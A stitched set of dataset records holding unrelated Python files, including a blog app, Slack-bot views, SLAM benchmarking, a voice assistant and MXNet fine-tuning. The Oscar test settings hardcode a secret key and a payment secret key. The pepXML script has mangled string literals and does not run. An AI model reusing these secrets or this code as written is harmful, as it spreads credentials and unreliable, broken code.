blog_key(name = 'default'):\n return db.Key.from_path('blogs', name)\n \r\nclass Blog(db.Model):\r\n subject = db.StringProperty(required = True)\r\n content = 
db.TextProperty(required = True)\r\n created = db.DateTimeProperty(auto_now_add = True)\r\n last_modified = db.DateTimeProperty(auto_now = True)\n \n def render(self):\n self._render_text = self.content.replace('\\n', '
')\n \r\nclass BlogFront(Handler):\n def get(self):\n posts = db.GqlQuery(\"select * from Blog order by created desc limit 10\")\n self.render(\"blog-front.html\", blogs = posts)\r\n \nclass Permalink(Handler):\n def get(self, post_id):\n post = db.GqlQuery(\"select * from Blog where id = :post_id\", post_id = post_id)\n \n if not post:\n self.error(404)\n return\n else:\n self.render(\"permalink.html\", post = post)\n \nclass NewPost(Handler):\r\n def render_front(self, subject=\"\", content=\"\", error=\"\"):\r\n self.render(\"newpost.html\", subject=subject, content=content, error=error)\r\n \r\n def get(self):\r\n self.render_front()\r\n \r\n def post(self):\r\n subject = self.request.get(\"subject\")\r\n content = self.request.get(\"content\")\r\n \r\n if subject and content:\r\n a = Blog(parent = blog_key(), subject=subject, content=content)\r\n a.put()\r\n self.redirect('/blog/%s' % str(a.key().id()))\n else:\r\n error = \"we need both subject and content!\"\r\n self.render_front(subject, content, error)\n\n'''\nFrom office hours\nPermalink:\np = Post(title, content) // Datastore will create UIDs\np.put() // puts it in datastore\n\nRedirect user to:\nblah = str(p.key().id()) // you get post id\nself.redirect('/blog/%s' %x)\n\nPost look-up\nSpecial URL mapper for permalinks using\nregular expressions:\n\n('/blog', MainPage),\n('/blog/([0-9]+)', PostHandler) // PERMALINK HANDLER\n\nClass PostHandler(...):\n def get(self, post_id):\n p = Post.get_by_id(post_id)\n if p:\n render...\n else:\n 404 error\n'''\n\r\napp = webapp2.WSGIApplication([('/blog/?', BlogFront),\n ('/blog/newpost/?', NewPost),\n ('/blog/([0-9]+)', Permalink)], debug=True)","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535123251","text":"import os\nimport subprocess\n\nTUM_PATH = os.path.join(os.path.expanduser('~'), 'TUM')\nORB_SLAM2_PATH = os.path.join(os.path.expanduser('~'), 'ORB_SLAM2')\nEVA_PATH = os.path.join(os.path.expanduser('~'), 'evaluate_ate_scale')\nNUM_TEST = 5\n\n\nTUM_EXECUTABLE = os.path.join(ORB_SLAM2_PATH, 'Examples', 'RGB-D', 'rgbd_tum')\nTUM_YAML = os.path.join(ORB_SLAM2_PATH, 'Examples', 'RGB-D', 'TUM{}.yaml')\nORB_VOC = os.path.join(ORB_SLAM2_PATH, 'Vocabulary', 'ORBvoc.txt')\nASSOCIATE_PY = os.path.join(EVA_PATH, 'associate.py')\nEVA_PY = os.path.join(EVA_PATH, 'evaluate_ate_scale.py')\n\n\nall_data = os.listdir(TUM_PATH)\n\n\nfor each_data in all_data:\n\tif 'freiburg3' in each_data:\n\t\tyaml_path = TUM_YAML.format(3)\n\telif 'freiburg2' in each_data:\n\t\tyaml_path = TUM_YAML.format(2)\n\n\tdata_path = os.path.join(TUM_PATH, each_data)\n\trgb_path = os.path.join(TUM_PATH, each_data, 'rgb.txt')\n\tdepth_path = os.path.join(TUM_PATH, each_data, 'depth.txt')\n\tgt_path = os.path.join(TUM_PATH, each_data, 'groundtruth.txt')\n\tasso_path = os.path.join(TUM_PATH, each_data, 'associations.txt')\n\n\ttrajectory_path = './CameraTrajectory.txt'\n\n\t#First associate depth and rgb\n\tsubprocess.Popen(\"python {} {} {} > {}\".format(ASSOCIATE_PY, rgb_path, depth_path, asso_path), shell=True).communicate() \n\tfor i in range(NUM_TEST):\n\t\tplot_name = each_data + '_plot{}.png'.format(i)\n\t\toutput_file_name = each_data + '_error{}.txt'.format(i)\n\n\t\tif os.path.exists(trajectory_path):\n\t\t\tos.remove(trajectory_path)\n\t\t\tprint(\"Remove previous trajectory file\")\n\t\t#Run ORBSLAM\n\t\tprint(\"Running ORB_SLAM2 {}/{}\".format(i+1, 
NUM_TEST))\n\t\tsubprocess.Popen(\"{} {} {} {} {}\".format(TUM_EXECUTABLE, ORB_VOC, yaml_path, data_path, asso_path), shell=True).communicate() \n\n\t\t#Finish\n\t\tsubprocess.Popen(\"python {} --plot={} {} {} > {}\".format(EVA_PY, \n\t\t\tplot_name ,\n\t\t\tgt_path, \n\t\t\ttrajectory_path, \n\t\t\toutput_file_name), \n\t\t\t\t\tshell=True).communicate() \n","sub_path":"TUM_rgbd_baseline.py","file_name":"TUM_rgbd_baseline.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"237979833","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"SQL Authentication Plugin.\n\n$Id: sql.py,v 1.0 2004/10/11 mriya3\n\"\"\"\nfrom zope.app.sqlscript import SQLScript\nimport zope.interface\nimport interfaces\n\nclass SQLAuthenticationPlugin(SQLScript):\n \"\"\" SQL Authentication Plugin for Pluggable Authentication System \"\"\"\n \n zope.interface.implements(interfaces.IAuthenticationPlugin)\n \n def authenticateCredentials(self, credentials):\n result = self(**credentials)\n if not len(result):\n return None\n return str(result[0]['id']),result[0]\n\n\n \n \n","sub_path":"Zope3/tags/before-blow-services-merge/src/zope/app/authentication/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"127663477","text":"import bisect\nclass ExamRoom(object):\n# L record the index of seats where people sits\n def __init__(self, N):\n \"\"\"\n :type N: int\n \"\"\"\n self.N = N\n self.L = []\n\n\n def seat(self):\n \"\"\"\n :rtype: int\n \"\"\"\n N,L = self.N,self.L\n if not L:\n res = 0\n else:\n d,res = L[0],0\n for a,b in zip(L,L[1:]):\n if (b-a) /2> d :\n d,res = (b-a)//2,(b+a)//2\n if N-1-L[-1] >d:\n res = N-1\n bisect.insort(L,res)\n return res\n\n\n\n\n def leave(self, p):\n \"\"\"\n :type p: int\n :rtype: None\n \"\"\"\n self.L.pop(p)\n\nimport heapq\nclass ExamRoom2:\n\n def dist(self, x, y):\n if x == -1:\n return -y\n elif y == self.N:\n return -(self.N - 1 -x)\n else:\n return -(abs(x-y)//2)\n\n def __init__(self,N):\n self.N = N\n self.pq = [(self.dist(-1,N),-1,N)]\n\n def seat(self):\n _,x,y = heapq.heappop(self.pq)\n if x == -1:\n seat = 0\n elif y == self.N:\n seat = self.N - 1\n else:\n seat = (x+y)//2\n heapq.heappush(self.pq, (self.dist(x,seat),x,seat))\n heapq.heappush(self.pq,(self.dist(seat,y),seat,y))\n return seat\n\n def leave(self,p):\n head = tail = None\n for interval in self.pq:\n if interval[1] == p:\n tail = interval\n if interval[2] == p:\n head = interval\n if head and tail:\n break\n self.pq.remove(head)\n self.pq.remove(tail)\n heapq.heapify(self.pq)\n 
heapq.heappush(self.pq,(self.dist(head[1],tail[2]),head[1],tail[2]))\n\n","sub_path":"quora/leetcode855.py","file_name":"leetcode855.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"262906928","text":"#!/usr/bin/python\nimport os\nimport sys\nimport massspec_toolbox_config as conf\n\n(db_name, filename_fasta) = conf.get_dbinfo()\nsys.stderr.write(\"Use %s as DB file\\n\"%filename_fasta)\n\nfor filename_pepxml in os.listdir('sequest.pepxml/'):\n if( not filename_pepxml.endswith('.pepxml') ):\n continue\n filename_pepxml = os.path.join('sequest.pepxml',filename_pepxml)\n filename_pepxml_tmp = filename_pepxml+'.tmp'\n f_tmp = open(filename_pepxml_tmp,'w')\n f_pepxml = open(filename_pepxml,'r')\n for line in f_pepxml:\n line = line.strip()\n if( line.startswith('\\n'%filename_fasta)\n elif( line.startswith('\\n'%filename_fasta)\n elif( line.startswith('\\n'%filename_fasta)\n else:\n f_tmp.write('%s\\n'%line)\n f_pepxml.close()\n f_tmp.close()\n os.rename(filename_pepxml_tmp,filename_pepxml)\n","sub_path":"pipeline/sequest.pepxml-setdb.py","file_name":"sequest.pepxml-setdb.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425104669","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404, JsonResponse\nfrom django.core.exceptions import SuspiciousOperation\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib\nimport json\n\nfrom .models import Reply\n\nWEBHOOK_URL = 'YOUR_WEBHOOK_URL'\nVERIFICATION_TOKEN = 'YOUR_VERIFICATION_TOKEN'\nACTION_HOW_ARE_YOU = 'HOW_ARE_YOU'\n\ndef index(request):\n positive_replies = Reply.objects.filter(response=Reply.POSITIVE)\n neutral_replies = Reply.objects.filter(response=Reply.NEUTRAL)\n negative_replies = Reply.objects.filter(response=Reply.NEGATIVE)\n\n context = {\n 'positive_replies': positive_replies,\n 'neutral_replies': neutral_replies,\n 'negative_replies': negative_replies,\n\n }\n return render(request, 'index.html', context)\n\ndef clear(request):\n Reply.objects.all().delete()\n return redirect(index)\n\ndef announce(request):\n if request.method == 'POST':\n data = {\n 'text': request.POST['message']\n }\n post_message(WEBHOOK_URL, data)\n\n return redirect(index)\n\n@csrf_exempt\ndef echo(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n if request.POST.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n user_name = request.POST['user_name']\n user_id = request.POST['user_id']\n content = request.POST['text']\n\n result = {\n 'text': '<@{}> {}'.format(user_id, content.upper()),\n 'response_type': 'in_channel'\n }\n\n return JsonResponse(result)\n\n@csrf_exempt\ndef hello(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n if request.POST.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n user_name = request.POST['user_name']\n user_id = request.POST['user_id']\n content = request.POST['text']\n\n result = {\n 'blocks': [\n {\n 'type' : 'section',\n 'text' : {\n 'type': 'mrkdwn',\n 'text': '<@{}> How are you?'.format(user_id)\n },\n 'accessory': {\n 'type': 'static_select',\n 'placeholder': {\n 'type': 'plain_text',\n 'text': 'I am:',\n 'emoji': True\n },\n 'options': [\n {\n 'text': {\n 'type': 'plain_text',\n 'text': 'Fine.',\n 'emoji': True\n },\n 'value': 'positive'\n },\n {\n 'text': 
{\n 'type': 'plain_text',\n 'text': 'So so.',\n 'emoji': True\n },\n 'value': 'neutral'\n },\n {\n 'text': {\n 'type': 'plain_text',\n 'text': 'Terrible.',\n 'emoji': True\n },\n 'value': 'negative'\n }\n ],\n 'action_id': ACTION_HOW_ARE_YOU\n }\n }\n ],\n 'response_type': 'in_channel'\n }\n\n return JsonResponse(result)\n\n@csrf_exempt\ndef reply(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n payload = json.loads(request.POST.get('payload'))\n print(payload)\n if payload.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n if payload['actions'][0]['action_id'] != ACTION_HOW_ARE_YOU:\n raise SuspiciousOperation('Invalid request.')\n \n user = payload['user']\n selected_value = payload['actions'][0]['selected_option']['value']\n response_url = payload['response_url']\n\n if selected_value == 'positive':\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.POSITIVE)\n reply.save()\n response = {\n 'text': '<@{}> Great! :smile:'.format(user['id'])\n }\n elif selected_value == 'neutral':\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.NEUTRAL)\n reply.save()\n response = {\n 'text': '<@{}> Ok, thank you! :sweat_smile:'.format(user['id'])\n }\n else:\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.NEGATIVE)\n reply.save()\n response = {\n 'text': '<@{}> Good luck! :innocent:'.format(user['id'])\n }\n \n post_message(response_url, response)\n\n return JsonResponse({})\n\ndef post_message(url, data):\n headers = {\n 'Content-Type': 'application/json',\n }\n req = urllib.request.Request(url, json.dumps(data).encode(), headers)\n with urllib.request.urlopen(req) as res:\n body = res.read()","sub_path":"team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"358504166","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^admin_home/', views.admin_home, name='admin_home'),\n url(r'^centrosMedicos_lista/', views.centrosMedicos_lista, name='centrosMedicos_lista'),\n url(r'^centroMedico_alta/', views.centroMedico_alta, name='centroMedico_alta'),\n url(r'^centroMedico_baja/', views.centroMedico_baja, name='centroMedico_baja'),\n url(r'^centroMedico_modificacion/', views.centroMedico_modificacion, name='centroMedico_modificacion'),\n url(r'^centroMedico_detalle/(?P[0-9A-Za-z]+)/$', views.centroMedico_detalle, name='centroMedico_detalle'),\n]\n","sub_path":"apps/administracion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"249078825","text":"# \"\"\"\n# Django settings for tests project.\n# \"\"\"\n\nimport os\n\nfrom oscar.defaults import *\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = '+&l^d!%soa4gxsnx7_txbo0x3uv$@4i&n!r8yte72otwqo7vmh'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nOSCAR_DEFAULT_CURRENCY = 'EUR'\nOSCAR_REQUIRED_ADDRESS_FIELDS = []\nOSCAR_SLUG_ALLOW_UNICODE = False\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n)\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n\n 'oscar',\n 'oscar.apps.analytics',\n 'oscar.apps.checkout',\n 'oscar.apps.address',\n 'oscar.apps.shipping',\n 'oscar.apps.catalogue',\n 'oscar.apps.catalogue.reviews',\n 'oscar.apps.partner',\n 'oscar.apps.basket',\n 'oscar.apps.payment',\n 'oscar.apps.offer',\n 'oscar.apps.order',\n 'oscar.apps.customer',\n 'oscar.apps.search',\n 'oscar.apps.voucher',\n 'oscar.apps.wishlists',\n 'oscar.apps.dashboard',\n 'oscar.apps.dashboard.reports',\n 'oscar.apps.dashboard.users',\n 'oscar.apps.dashboard.orders',\n 'oscar.apps.dashboard.catalogue',\n 'oscar.apps.dashboard.offers',\n 'oscar.apps.dashboard.partners',\n 'oscar.apps.dashboard.pages',\n 'oscar.apps.dashboard.ranges',\n 'oscar.apps.dashboard.reviews',\n 'oscar.apps.dashboard.vouchers',\n 'oscar.apps.dashboard.communications',\n 'oscar.apps.dashboard.shipping',\n\n 'adyen',\n]\n\nADYEN_IDENTIFIER = 'OscaroFR'\nADYEN_SECRET_KEY = 'oscaroscaroscaro'\nADYEN_ACTION_URL = 'https://test.adyen.com/hpp/select.shtml'\nADYEN_SKIN_CODE = 'cqQJKZpg'\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n },\n}\n","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322501164","text":"import logging\nimport os\nimport sys\nimport unittest\nfrom configparser import ConfigParser\n\nfrom dotenv import load_dotenv\n\nfrom mop2.comprehension.azure.identity.azure_identity_credential_adapter import AzureIdentityCredentialAdapter\nfrom mop2.comprehension.azure.policy_insights.policy_definition_insight_scope import PolicyDefinitionInsightScope\nfrom mop2.utils.configuration import TESTINGPATH, TESTVARIABLES\nfrom mop2.utils.files import change_dir\n\n\nclass TestPolicyDefinitionInsightScope(unittest.TestCase):\n def setUp(self) -> None:\n load_dotenv()\n with change_dir(TESTINGPATH):\n 
self.config = ConfigParser()\n self.config.read(TESTVARIABLES)\n self.test_data_config = ConfigParser()\n test_data_file = self.config['DEFAULT']['test_data_file']\n self.test_data_config.read(test_data_file)\n\n self.subscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n self.tenant_id = os.environ[\"AZURE_TENANT_ID\"]\n self.management_group_id = os.environ[\"AZURE_MANAGEMENT_GROUP_ID\"]\n client_id = os.environ[\"CLIENT\"]\n client_secret = os.environ[\"KEY\"]\n\n logging_level = self.config['LOGGING']['level']\n logging.basicConfig(stream=sys.stdout, level=int(logging_level))\n\n def test_list_query_results_for_policy_definition(self):\n # Policy Defintion to be tested\n policy_definition_name = self.test_data_config['AZURE_POLICY'][\"policy_name_04\"]\n\n # Azure Active Directory Credentials\n credentials = AzureIdentityCredentialAdapter()\n policy_definition_insight = PolicyDefinitionInsightScope(operations_path=TESTINGPATH,\n config_variables=TESTVARIABLES)\n\n insights = policy_definition_insight.list_query_results_for_policy_definition(subscription_id=self.subscription_id,\n policy_definition_name=policy_definition_name,\n credentials = credentials)\n self.assertEqual(True, True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/mop2/azure/test_policy_definition_insight_scope.py","file_name":"test_policy_definition_insight_scope.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"80973085","text":"from functools import wraps\nfrom flask import g, request, redirect, url_for\nfrom flask_login import current_user\n\n# decorator to use to 'lock' a view to only be accessible to logged in users.\n# if the current_user is authenticated (only logged in users are authenticated), then return the view, otherwise redirect to login.\n# next is the url that the person was trying to access, which should be included in login so that the user can login and immediately be where they want.\ndef login_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n current_user.is_authenticated()\n except:\n return redirect(url_for('auth.login', next=request.url))\n return f(*args, **kwargs)\n return decorated_function","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"419473540","text":"import pyttsx3\r\nimport datetime\r\nimport time\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport os\r\nimport webbrowser\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice',voices[1].id)\r\nengine.setProperty('rate',200)\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\ndef wishme():\r\n hour = int(datetime.datetime.now().hour)\r\n\r\n if hour>=0 and hour<12:\r\n print(\"Good Morning\")\r\n speak(\"Good Morning\")\r\n\r\n elif hour>=12 and hour<=15:\r\n print(\"Good Afternoon\")\r\n speak(\"Good Afternoon\")\r\n\r\n else:\r\n print(\"Good Evening\")\r\n speak(\"Good Evening\")\r\n\r\n time.sleep(1)\r\n speak(\"Welcome to Rajiv Gandhi International Airport Hyderabad\")\r\n print(\"\\nSpeak any of the following to get the service\\nFLIGHT for flight information\\nAIRPORT for airport information\\nPNR for pnr information\")\r\n time.sleep(1)\r\n speak(\"\\nSpeak any of the following to get the service\\nFLIGHT for flight 
information\\nAIRPORT for airport information\\nPNR for pnr information\")\r\ndef takecommand():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Wait....Calibrating Microphone\")\r\n r.adjust_for_ambient_noise(source,duration=2)\r\n r.dynamic_energy_threshold = True\r\n print(\"It's your turn now....\")\r\n r.phrase_threshold = 0.8\r\n audio = r.listen(source)\r\n \r\n try:\r\n print(\"Recognizing.....\")\r\n query = r.recognize_google(audio, language = 'en-IN')\r\n print(\"You said:\",query)\r\n\r\n except Exception as e:\r\n print(\"Sorry.It's my fault.Will you say that again please...\")\r\n speak(\"Sorry It's my fault will you say that again please...\")\r\n query='None'\r\n \r\n return query\r\n\r\nif __name__ == \"__main__\":\r\n wishme()\r\n Airport={'Port Blair':'IXZ','Visakhapatnam':'VTZ','Tirupati':'TIR','Pasighat':'IXT','Guwahati':'GAU','Patna':'PAT','Darbhanga':'DBR','Raipur':'RPR','Delhi':'DEL','Goa':'GOI','Ahmedabad':'AMD','Surat':'STV','Hisar':'HSS','Shimla':'SLV','Srinagar':'SXR','Ranchi':'IXR','Bangalore':'BLR','Mangalore':'IXE','Thiruvananthapuram':'TRV','Kochi':'COK','Bhopal':'BHO','Indore':'IDR','Aurangabad':'IXU','Mumbai':'BOM','Nagpur':'NAG','Pune':'PNQ','Imphal':'IMF','Shillong':'SHL','Aizawl':'AJL','Dimapur':'DMU','Bhubaneswar':'BBI','Puducherry':'PNY','Amritsar':'ATQ','Jalandhar':'AIP','Jaipur':'JAI','Chennai':'MAA','Madurai':'IXM','Tiruchirapalli':'TRZ','Hyderabad':'HYD','Agartala':'IXA','Dehradun':'DED','Varanasi':'VNS','Lucknow':'LKO','Kanpur':'KNU','Agra':'AGR','Siliguri':'IXB','Kolkata':'CCU','Durgapur':'RDP'}\r\n while True:\r\n query=takecommand()\r\n\r\n if 'flight' in query:\r\n initial='None'\r\n destination='None'\r\n date1='None'\r\n opt='None'\r\n date2='None'\r\n \r\n print(\"Enter Boarding Airport\")\r\n speak(\"Enter Boarding Airport\")\r\n while initial=='None':\r\n initial=takecommand()\r\n \r\n print(\"Enter Destination Airport\")\r\n speak(\"Now,Enter Destination Airport\")\r\n while destination=='None':\r\n destination=takecommand()\r\n \r\n print(\"Now,Enter Journey date in Year Month Date format(For example for 7 December 2019 just say 2019 12 7)\")\r\n speak(\"Now,Enter Journey date Enter the date in Date Month year format.\")\r\n while date1=='None':\r\n date1=takecommand()\r\n \r\n print(\"is it a round trip Respond in yes or no\")\r\n speak(\"is it a round trip Respond in yes or no\")\r\n while opt=='None':\r\n opt=takecommand()\r\n \r\n if opt=='yes':\r\n print(\"Enter return Journey date Enter the date in Date Month year format.\")\r\n speak(\"Enter return Journey date Enter the date in Date Month year format.\")\r\n while date2=='None':\r\n date2=takecommand()\r\n webbrowser.open(\"https://www.google.com/flights?hl=en#flt=\"+Airport[initial]+\".\"+Airport[destination]+\".\"+date1+\"*\"+Airport[destination]+\".\"+Airport[initial]+\".\"+date2+\";c:INR;e:1;sd:1;t:f\")\r\n \r\n else:\r\n webbrowser.open(\"https://www.google.com/flights?hl=en#flt=\"+Airport[initial]+\".\"+Airport[destination]+\".\"+date1+\";c:INR;e:1;sd:1;t:f;tt:o\") \r\n\r\n elif 'airport' in query:\r\n speak('Rajiv Gandhi International Airport is an international airport that serves Hyderabad, the capital of the Indian state of Telangana. It is located in Shamshabad, about 24 kilometres (15 mi) south of Hyderabad. It was opened on 23 March 2008 to replace Begumpet Airport. It is named after Rajiv Gandhi, former Prime Minister of India. 
It is the only airport in India ranking in AirHelp list of top 10 airports in the world')\r\n\r\n elif 'stop' in query:\r\n speak(\"Thank You I am going to sleep now\")\r\n break\r\n\r\n elif 'what' and 'time' in query:\r\n now = datetime.datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Current Time =\", current_time)\r\n speak(current_time)\r\n\r\n elif 'wikipedia' in query:\r\n speak(\"Searching Wikipedia......\")\r\n query = query.replace(\"wikipedia\",\" \")\r\n results = wikipedia.summary(query,sentences=2)\r\n speak(\"According to wikipedia.....\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'open youtube' in query:\r\n speak(\"Opening youtube in few seconds\")\r\n webbrowser.open(\"youtube.com\")\r\n\r\n elif 'search' and 'youtube' in query:\r\n query=query.replace(\"youtube\",\" \")\r\n query=query.replace(\"search\",\" \")\r\n query=query.replace(\"in\",\" \")\r\n speak(\"searching your query in youtube Give me a second\")\r\n webbrowser.open(\"https://www.youtube.com/results?search_query=\"+query)\r\n \r\n elif 'open google' in query:\r\n speak(\"Opening Google in few seconds\")\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'search' and 'google' in query:\r\n query=query.replace(\"google\",\" \")\r\n query=query.replace(\"search\",\" \")\r\n query=query.replace(\"in\",\" \")\r\n speak(\"searching your query in google Give me a second\")\r\n webbrowser.open(\"https://www.google.com/search?client=firefox-b-d&q=\"+query)\r\n\r\n \r\n\r\n \r\n \r\n \r\n","sub_path":"final jarvis.py","file_name":"final jarvis.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"545036884","text":"__author__ = 'prism'\n__date__ = '30 May, 2015'\n\nfrom django.conf.urls import include, url\nfrom .views import Login, Logout\n\n\nurlpatterns = [\n url(r'^$', Login.as_view(), name='auth'),\n url(r'^logout/$', Logout.as_view()),\n]\n","sub_path":"mail/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"370944751","text":"'''\nadopted from flask+redis example\nhttp://flask.pocoo.org/snippets/71/\n'''\nfrom datetime import datetime\nimport time\nfrom flask import Flask, request\nfrom redis import Redis\n\napp = Flask(__name__)\napp.debug = True\n\napp.config['REDIS_HOST'] = '127.0.0.1'\napp.config['REDIS_PORT'] = 6379\napp.config['REDIS_DB'] = 0\n\nredis = Redis()\n\ndef mark_online(uid=None):\n '''\n add visitors to redis cache\n '''\n try:\n now = int(time.time())\n expires = now + (360)\n all_users_key = 'online-users/{}'.format(now)\n print('debug all_users_key {}'.format(all_users_key))\n user_key = 'user-activity/{}'.format(uid)\n p = redis.pipeline()\n p.sadd(all_users_key, uid)\n p.set(user_key, now)\n p.expireat(all_users_key, expires)\n p.expireat(user_key, expires)\n print('debug user_key {}'.format(user_key))\n p.execute()\n except Exception as error:\n print('debug: mark_online err {}'.format(error))\n\ndef get_user_last_activity(uid):\n '''\n display active users in redis cache\n '''\n last_active = redis.get('user-activity/{}'.format(uid))\n if last_active is None:\n return None\n return datetime.utcfromtimestamp(int(last_active))\n\n@app.route('/')\ndef index():\n '''\n default page and recorder of visitor\n '''\n mark_online(request.remote_addr)\n return('Hello from Flask! 
{}+{}'\n ).format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n request.remote_addr)\n\n@app.route('/activity')\ndef active():\n '''\n get last users\n '''\n return('activity of visitors {}'\n ).format(get_user_last_activity(request.remote_addr))\n","sub_path":"cloud-init/pt.py","file_name":"pt.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"385336659","text":"from mxnet.gluon.model_zoo import vision as models\n\nimport d2lzh as d2l\nfrom mxnet import gluon, init, nd\nfrom mxnet.gluon import data as gdata, loss as gloss, model_zoo, nn\nfrom mxnet.gluon import utils as gutils\nimport os\nimport zipfile\n\ndata_dir = './data'\n# base_url = 'https://apache-mxnet.s3-accelerate.amazonaws.com/'\n# fname = gutils.download(\n# base_url + 'gluon/dataset/hotdog.zip',\n# path=data_dir, sha1_hash='fba480ffa8aa7e0febbb511d181409f899b9baa5')\n# with zipfile.ZipFile(fname, 'r') as z:\n# z.extractall(data_dir)\n\n\ntrain_imgs = gdata.vision.ImageFolderDataset(\n os.path.join(data_dir, 'hotdog/train'))\ntest_imgs = gdata.vision.ImageFolderDataset(\n os.path.join(data_dir, 'hotdog/test'))\n\nhotdogs = [train_imgs[i][0] for i in range(8)]\nnot_hotdogs = [train_imgs[-i - 1][0] for i in range(8)]\nd2l.show_images(hotdogs + not_hotdogs, 2, 8, scale=1.4);\n\n\n# 指定RGB三个通道的均值和方差来将图像通道归一化\nnormalize = gdata.vision.transforms.Normalize(\n [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\ntrain_augs = gdata.vision.transforms.Compose([\n gdata.vision.transforms.RandomResizedCrop(224),\n gdata.vision.transforms.RandomFlipLeftRight(),\n gdata.vision.transforms.ToTensor(),\n normalize])\n\ntest_augs = gdata.vision.transforms.Compose([\n gdata.vision.transforms.Resize(256),\n gdata.vision.transforms.CenterCrop(224),\n gdata.vision.transforms.ToTensor(),\n normalize])\n\n\n\npretrained_net = models.resnet18_v2(pretrained=True)\n\n\n# print(pretrained_net.output)\n\nfinetune_net = model_zoo.vision.resnet18_v2(classes=2)\nfinetune_net.features = pretrained_net.features\nfinetune_net.output.initialize(init.Xavier())\n# output中的模型参数将在迭代中使用10倍大的学习率\nfinetune_net.output.collect_params().setattr('lr_mult', 10)\n\n\n\n# print(nn.Flatten())\n\n# def train_fine_tuning(net, learning_rate, batch_size=128, num_epochs=5):\n# train_iter = gdata.DataLoader(\n# train_imgs.transform_first(train_augs), batch_size, shuffle=True)\n# test_iter = gdata.DataLoader(\n# test_imgs.transform_first(test_augs), batch_size)\n# ctx = d2l.try_all_gpus()\n# net.collect_params().reset_ctx(ctx)\n# net.hybridize()\n# loss = gloss.SoftmaxCrossEntropyLoss()\n# trainer = gluon.Trainer(net.collect_params(), 'sgd', {\n# 'learning_rate': learning_rate, 'wd': 0.001})\n# 